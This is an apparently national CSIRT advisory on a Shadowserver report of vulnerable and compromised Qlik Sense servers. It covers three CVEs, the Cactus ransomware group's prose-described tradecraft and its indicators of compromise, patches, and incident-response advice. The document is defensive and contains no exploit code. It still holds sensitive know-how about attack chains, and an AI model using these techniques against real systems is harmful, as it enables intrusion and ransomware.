Qlik Sense Special Report

Description

On the 28th April 2024, the Shadowserver Foundation published the Vulnerable/Compromised Qlik Sense Special Report , The Special report identified hosts, within the jurisdiction, reported to be running Qlik Sense Systems. The Qlik Software Company has publicly disclosed three (3) Common Vulnerabilities & Exposures (CVEs) that affect their Qlik Sense Enterprise for Windows. The company which was originally founded in Sweden in 1993, is now based in Pennsylvania, USA.

The Cactus Ransomware Group, which is being researched by Fox-IT., part of the information assurance firm NCC Group, based in Manchester, UK., in collaboration with a number of Dutch cyber security firms have reported the group to be actively targeting and exploiting Qlik Sense Systems for initial access since November 2023.

Fox-IT., developed a fingerprinting technique to identify Qlik Sense systems that are vulnerable to the method and techniques employed by the Cactus Ransomware Group to gain initial access to the Qlik Sense System, and more critically, which systems are already compromised.

In the Shadowserver Foundation Vulnerable/Compromised Qlik Sense Special Report published on the 28th April 2024, Six (6) hosts, identified to have Qlik Sense Systems, are reported to be compromised.

Constituents are advised to take appropriate action in the event of having a host identified to be running the Qlik Sense System in the Shadowserver Foundation Vulnerable/Compromised Qlik Sense Special Report dated the 28th April 2024.

The Shadowserver Foundation vulnerable/Compromised Qlik-Sense Special Report has a default severity level of 'Critical'.

Qlik Sense

Qlik Sense is a data analysis and visualisation software. It operates with an associative QIX engine which enables the user to link and associate data from varied sources and carries out dynamic searching and selections. Qlik Sense serves as a data analytics platform for a wide range of users i.e. from non-technical to technical users. Qlik Sense utilises data visualization as it has augmented graphics making it possible to show and analyse data graphicaly.

HTTP listens on port 80/TCP.

HTTPS listens on port 443/TCP.

Problem

In August 2023, Two (2) security vulnerabilities in Qlik Sense Enterprise for Windows were identified by Adam Crosser and Thomas Hendrickson of the Cybersecurity Company, Praetorian, based in Austin, Texas, USA. These vulnerabilities involved HTTP Tunneling and Path Traversal, It was also discovered if the two vulnerabilities are combined and successfully exploited, these issues could lead to a compromise of the server running the Qlik Sense software, including unauthenticated remote code execution (RCE).

The Qlik Software Company publicly disclosed three (3) Common Vulnerabilities & Exposures (CVEs) that affect their Qlik Sense Enterprise for Windows on the respective dates shown.

No.	CVEs	Description	Disclosed
1.	CVE-2023-41265.	HTTP Tunneling Vulnerability in Qlik Sense Enterprise for Windows.	29th Aug 2023.
2.	CVE-2023-41266.	Path Traversal Vulnerability in Qlik Sense Enterprise for Windows.	29th Aug 2023.
3.	CVE-2023-48365.	Unauthenticated remote code execution (RCE) vulnerability in Qlik Sense Enterprise for Windows as a consequence of an incomplete fix for CVE-2023-41265.	20th Sep 2023.

On the 25th April 2024, Willem Zeeman and Yun Zheng Hu of Fox-IT., part of the information assurance firm, NCC Group, based in Manchester, UK., in collaboration with a number of Dutch cyber security firms that had being researching the Cactus Ransomware Group, reported the group modus operandi of exploiting Qlik Sense systems for initial access which they have been actively targeting since November 2023.

Fox-IT together with their colleagues from the various Dutch cyber security firms discovered that the Cactus Ransomware Group use a particular method and technique for initial access to the Qlik Sense systems. Based upon these discoveries, Fox-IT., developed a fingerprinting technique to identify Qlik Sense systems that are vulnerable to this method and technique of initial access, and even more critically, which systems are already compromised.

Arctic Wolf Networks, the computer and network security company, based in Eden Prairie, Minnesota, USA., on the 28th Nov 2024 published a list of Indicators of Compromise (IoCs), they had observed, in their incident response (IR) investigation into the new Cactus Ransomware Group campaign which are reported to exploit publicly exposed installations of Qlik Sense.

Cactus Ransomware Group - Indicators of Compromise (IoCs).

No.	Reported by	Description	Article - IOCs
1.	Fox-IT.	The Cactus Ransomware Group are reported to redirect the output of executed commands to a True Type font file named qle.ttf, likely abbreviated for “qlik exploit”. In addition to the qle.ttf file, Fox-IT have also observed instances where qle.woff was used. These font files are not part of a default Qlik Sense server installation. Fox-IT discovered that files with a font file extension such as .ttf and .woff can be accessed without any authentication, regardless of whether the server is patched. This may explain why the Cactus ransomware group opted to store command output in font files within the fonts directory, which in turn, also serves as a useful Indicator Of Compromise (IoCs).	Fox-IT - Identifying Cactus ransomware victims
2.	Arctic Wolf Labs.	The Cactus Ransomware Group are reported to leveraged PowerShell and the Background Intelligent Transfer Service (BITS) to download additional tools to establish persistence and ensure remote control, including Renamed ManageEngine UEMS executables, with a ZIP extension masquerading as Qlik files. These files were renamed again after being downloaded and invoked for silent installation. AnyDesk is downloaded directly from anydesk.com. A Plink (PuTTY Link) binary is downloaded and renamed to putty.exe. Current evidence revealed that RDP is used for lateral movement, WizTree disk space analyzer is downloaded, rclone (renamed as svchost.exe) is leveraged for data exfiltration.	ArcticWolf Labs - Qlik Sense Exploited in Cactus Ransomware Campaign

Common Vulnerabilities & Exposures (CVEs)

Systems used for reporting and assessing the severity of security vulnerabilities.

No.	System	Description
1.	Common Vulnerabilities and Exposures (CVE).	The CVE system is used to identify, define, catalogue and publicly disclosed known information-security vulnerabilities and exposures.
2.	The Common Vulnerability Scoring System (CVSS).	CVSS is a free and open industry standard for assessing the severity of computer system security vulnerabilities. It provides a numerical (0-10) representation of the severity of an information security vulnerability.

CVSSv3.0 Metrics.

No.	Base Score Range	Severity
1.	0.0	None
2.	0.1 - 3.9	Low
3.	4.0 - 6.9	Medium
4.	7.0 - 8.9	High
5.	9.0 - 10.0	Critical

List of CVEs - Qlik Sense Enterprise for Windows

Publicly disclosued on the 29th Aug 2023 & 20th Sep 2023.

No.	CVE Report	Description	CVSSv3	Advisory
1.	CVE-2023-41265	A HTTP tunnelling vulnerability in Qlik Sense Enterprise for Windows due to improper validation of HTTP headers. If successfully exploited an attacker could elevate their privileges and execute HTTP requests on the backend server hosting the software.	9.6	Qlik Community Critical Security Fix
2.	CVE-2023-41266	A path traversal vulnerability in Qlik Sense Enterprise for Windows stemming from improper user input validation which could allow a remote, unauthenticated attacker to create an anonymous session by sending maliciously crafted HTTP requests. This anonymous session could allow them to send further requests to unauthorized endpoints.	8.2	Qlik Community Security Fix
3.	CVE-2023-48365	Unauthenticated remote code execution (RCE) vulnerability in Qlik Sense Enterprise for Windows as a consequence of an incomplete fix for CVE-2023-41265. Due to improper validation of HTTP headers, a remote attacker is able to elevate their privilege by tunneling HTTP requests, allowing them to execute HTTP requests on the backend server that hosts the repository application.	9.6	Qlik Community Critical Security Fix

Note: Constituents, on clicking the CVE link in the table above, will be directed to the www.mitre.org webpage, which contain relevant information on the particular CVE No. Constituents, then have the option to click on the www.cve.org link, which will direct them to the www.cve.org webpage, where additional information on the CVE in question, can be accessed, on inserting the CVE No. in the Find field.

Solution

Shadowserver Foundation - Qlik Sense Special Report - Tag Index.

Note: The Shadowserver Foundation has included in the 'Tag' column of their report, a list of terms, which indicate the type of vulnerability associated with the specific host identified in the report.

No.	System	Description
1.	CVE-2023-41265.	A HTTP tunnelling vulnerability in Qlik Sense Enterprise for Windows due to improper validation of HTTP headers. If successfully exploited an attacker could elevate their privileges and execute HTTP requests on the backend server hosting the software.
2.	CVE-2023-41266.	A path traversal vulnerability in Qlik Sense Enterprise for Windows stemming from improper user input validation which could allow a remote, unauthenticated attacker to create an anonymous session by sending maliciously crafted HTTP requests. This anonymous session could allow them to send further requests to unauthorized endpoints.
3.	CVE-2023-48365.	Unauthenticated remote code execution vulnerability in Qlik Sense Enterprise for Windows as a consequence of an incomplete fix for CVE-2023-41265. Due to improper validation of HTTP headers, a remote attacker is able to elevate their privilege by tunneling HTTP requests, allowing them to execute HTTP requests on the backend server that hosts the repository application.
4.	Injected-code;webshell.	Fox-IT in their research into the Cactus Ransomware Group and of their modus operandi of exploiting Qlik Sense systems discovered that files with a font file extension such as .ttf and .woff can be accessed without any authentication, regardless of whether the server is patched. This, they say, explains why the Cactus Ransomware Group opted to store command output in font files within the fonts directory, which in turn, also serves as a useful Indicator of Compromise (IoC). A Potential instance of a Compromised Qlik Sense System is determined remotely by checking for the presence of files with .ttf or .woff file extension.

Recommendations.

No.	Tag	Affected Software	Recommendations
1.	CVE-2023-41265.	All versions of Qlik Sense Enterprise for Windows prior to and including these releases are impacted: May 2023 Patch 3, February 2023 Patch 7, November 2022 Patch 10, August 2022 Patch 12.	Qlik Sense Enterprise for Windows should be upgraded to a version containing fixes for these issues. Fixes are available for the following versions: August 2023 Initial Release, May 2023 Patch 4, February 2023 Patch 8, November 2022 Patch 11, August 2022 Patch 13.
2.	CVE-2023-41266.	All versions of Qlik Sense Enterprise for Windows prior to and including these releases are impacted: May 2023 Patch 3, February 2023 Patch 7, November 2022 Patch 10, August 2022 Patch 12.	Qlik Sense Enterprise for Windows should be upgraded to a version containing fixes for these issues. Fixes are available for the following versions: August 2023 Initial Release, May 2023 Patch 4, February 2023 Patch 8, November 2022 Patch 11, August 2022 Patch 13.
3.	CVE-2023-48365.	All versions of Qlik Sense Enterprise for Windows prior to and including these releases are impacted: August 2023 Patch 1, May 2023 Patch 5, February 2023 Patch 9, November 2022 Patch 11, August 2022 Patch 13, May 2022 Patch 15, February 2022 Patch 14, November 2021 Patch 16.	Qlik Sense Enterprise for Windows should be upgraded to a version containing fixes for these issues. Fixes are available for the following versions: November 2023 Initial Release, August 2023 Patch 2, May 2023 Patch 6, February 2023 Patch 10, November 2022 Patch 12, August 2022 Patch 14, May 2022 Patch 16, February 2022 Patch 15, November 2021 Patch 17.
4.	Injected-code;webshell	Constituents are advised to read the article published by Fox-IT on the 25th April 2024 and the article published by Arctic Wolf Labs on the 28th Nov 2024, both articles contain details of the modus operandi of the Cactus Ransomware Group in exploiting Qlik Sense systems together with a list of Indicators of Compromise (IoCs). (See - Cactus Ransomware Group - Indicators of Compromise (IoCs) - above for links)	Constituents are advised to disconnecting their network from the internet, This action will cut off the Cactus Ransomware Group access to the compromised computer preventing them from exfiltrating data. Disconnect backup devices from the compromised computer and protect all data backups. Switching the computer off, may destroy valuable forensic evidence, which may be required to establish how the computer and network security was breached. Change passwords for all login accounts on the network and cloud services using a computer on a seperate network. Investigate the incident to establish the facts, Consult with cyber security experts, if necessary. In the event of a crime, the incident must be reported to An Gardai Siochana.

Qlik Sense Architecture Components.

No.	Component	Description
1.	Qlik Sense Clients.	The Qlik Sense Hub is the platform where the user performs operations on the data and creates applications with required visualizations. It is the place where users connect with the software and design dashboards for their business analysis. It provides easy drag-and-drop functionality, associative data model, range of visualization etc. The viewing of final dashboards is flexible as the screen and its contents are automatically adjusted according to the screen size of the device such as a laptop, desktop, tablet, mobile. The hub is developed by utilising HTML5, CSS3 and JavaScript.
2.	Qlik Sense Nodes.	The nodes are physical or logical computers that deploy separate or a combination of services. This assigns certain roles to a node. There can be primarily three types of roles of a node based on the services it provides. User or consumer node that delivers apps to the end users. Scheduler node which manages all the service and app reloads. Proxy node that handles authentication processes, load balancing, and session handling. Thus, typically there are two types of nodes, central nodes and rim nodes. Each node is capable of taking up multiple roles, deploying a combination of Qlik Sense services and operate independently. A node can be used for either production, development or both at the same time.
3.	Qlik Sense Sites.	A Qlik Sense site consists of a node system. It can have a single node or multiple nodes systems, also known as servers. Every node system has a single repository, database, and license. A single-node deployment consists only of the central node which has got all the required services deployed on it. It works in sync with the data repository and file sharing systems. Whereas, a multi-node site is a distributed system having services distributed across many nodes. The central node manages all the peripheral nodes. All the nodes share the same repository, database and license key. A multi-node system also provides better scalability, resilience, reliability, governance, capacity and flexibility to suit customer requirements.
4.	Qlik Sense Storage.	There are two (2) storage components that work with other architectural components. One is the repository database, and another is a file share system. A repository database is also known as a Postgre database that keeps metadata. Moreover, this data is called entity data and is not very large in size. A file share system stores the Qlik Sense application data like dimensions, measures, objects, and visualizations as binary files and such data files are made available to all the nodes or servers in a site. Thus, Qlik Sense apps stores as QVF files.

Qlik Sense Architecture Services.

No.	Service	Description
1.	Qlik Sense Proxy (QSP).	The QSP serves as the entry point for both users and administrators via sources like hub and management console. The QSP serves many purposes like, Session management, License provisioning, Handling load balancing, Connecting with user identity providers like SAML, Active directory.
2.	Qlik Sense Engine (QIX).	It is the main interactive or associative engine which facilitates all the major functionalities of Qlik Sense. The functions of QIX are, In-memory data indexing and calculations (the engine is RAM-based), Smart searching, Interactive and self-service interactions, Corresponds with Scheduler, repository, and applications.
3.	Qlik Sense Schedule (QSS).	The QSS schedules and coordinate the data loads and application reloading.
4.	Qlik Sense Repository (QSR).	The repository is the place where all the data and information regarding the configuration and management of other Qlik Sense services. The main areas of work of QSR are, Managing user definitions Security.
5.	Qlik Sense Applications (QVF).	This is the final layer where the user uses the data to create visualizations and sheets in Qlik Sense. A Qlik Sense application may have one or more sheets and a complete set of those makes an application or a Qlik Sense .QVF file. Such files contain data in compressed form, a data model pertaining to the data loaded into the Qlik Sense’s in-memory and a final presentation layer.

Additional Information

Shadowserver Foundation - Vulnerable or Compromised Qlik Sense Special Report.
Fox IT - Sifting through the Spines: Identifying (potential) Cactus Ransome Victims.
Arctic Wolf Labs - Qlik Sense Exploited in Cactus Ransome Campaign.
Arctic Wolf Labs - CVE-2023-41265, CVE-2023-41266 & CVE-2023-48365: Multiple Vulnerabilities in Qlik Sense Enterprise Actively Exploited.
ZeroQlik: Achieving Unauthenticated Remote Code Execution via HTTP Request Tunneling and Path Traversal.
Cybersecuritydive - Schneider Electric hit by ransomware attack against its sustainability business division.
SOCRader - Dark Web Profile: Cactus Ransomware.
Bitdefender - CACUS: Analyzing a Coordinated Ransomware Attack on Corporate Networks.
Qlik Help.
Qlik Sense Architecture – 4 Major Components of Architecture.
101. What is QIX and Why Should You Care?.
Qlik Sense Tutorial For Beginners – Features and Architecture.
PrickSense: How Cactus Exploits Qlik Sense.
RFC2616 - Hypertext Transfer Protocol -- HTTP/1.1.
Cyberveilig Nederland - Press release: Melissa partnership finds several Dutch victims of ransomware group Cactus.
Critical Security fixes for Qlik Sense Enterprise for Windows (CVE-2023-41266, CVE-2023-41265).
Critical Security fixes for Qlik Sense Enterprise for Windows (CVE-2023-48365).